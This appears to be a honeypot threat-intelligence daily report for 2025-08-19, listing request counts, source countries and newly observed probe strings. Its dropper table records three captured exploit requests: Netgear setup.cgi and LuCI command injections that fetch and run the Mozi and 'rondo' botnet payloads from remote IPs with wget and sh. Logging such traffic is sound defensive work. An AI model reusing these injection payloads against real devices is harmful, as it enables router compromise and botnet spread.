Daily Report: 2025-08-19#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).
There are 16 new requests that have never been observed before (these were added to the monitored request database.).
A total of 826 requests were recorded during the day, originating from 3 different countries, with a peak of 458 requests coming from US.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Germany |
DE | Germany |
US | Dubai |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
1.70.13.22 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://1.70.13.22:38117/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
117.11.140.215 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.11.140.215:58211/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
45.156.87.165 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zqq.sh%7Csh%60 HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
20 | 5 | POST /cn/cmd HTTP/1.1 |
114 | 2 | \x10\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00 |
133 | 1 | \x00\x0E8\xD0s\xCA\xDDKk\xF4b\x00\x00\x00\x00\x00 |
198 | 1 | GET /api/me HTTP/1.1 |
278 | 1 | \x00\x0E8\xC8MiT/\xB4\x98\x14\x00\x00\x00\x00\x00 |
283 | 1 | GET /OdinHttpCall1755631302 HTTP/1.1 |
284 | 1 | GET /Odin/http/call1755631302 HTTP/1.1 |
285 | 1 | GET /odinhttpcall1755631302 HTTP/1.1 |
316 | 1 | \x00\x0E\x08\x08\x02\xDE%\x957\xBB?\x00\x00\x00\x00\x00 |
317 | 1 | \x00\x0E8\x08\x02\xDE%\x957\xBB?\x00\x00\x00\x00\x00 |
318 | 1 | \x00\x0E\x08n\xFB\xB8\xD0\xF8p\x96c\x00\x00\x00\x00\x00 |
319 | 1 | \x00\x0E8n\xFB\xB8\xD0\xF8p\x96c\x00\x00\x00\x00\x00 |
320 | 1 | \x00\x0E\x08\x03pHAP)QQ\x00\x00\x00\x00\x00 |
321 | 1 | \x00\x0E8\x03pHAP)QQ\x00\x00\x00\x00\x00 |
322 | 1 | \x00\x0E\x08\xC4->\xCA\xCB\x17\x8E\x90\x00\x00\x00\x00\x00 |
323 | 1 | \x00\x0E8\xC4->\xCA\xCB\x17\x8E\x90\x00\x00\x00\x00\x00 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 458 | US |
1 | 82 | GB |
2 | 46 | AR |
3 | 46 | IR |
4 | 43 | DE |
5 | 22 | NL |
6 | 19 | SC |
7 | 18 | BG |
8 | 12 | CN |
9 | 12 | HK |
10 | 11 | SA |
11 | 9 | ZA |
12 | 8 | IN |
13 | 6 | HU |
14 | 6 | LT |
15 | 3 | TR |
16 | 2 | BE |
17 | 2 | AE |
18 | 2 | SG |
19 | 2 | VN |
20 | 2 | PH |
21 | 2 | LU |
22 | 2 | CH |
23 | 2 | PL |
24 | 1 | KR |
25 | 1 | MY |
26 | 1 | PA |
27 | 1 | EE |
28 | 1 | RU |
29 | 1 | ID |
30 | 1 | CA |
31 | 1 | BR |
32 | 1 | CZ |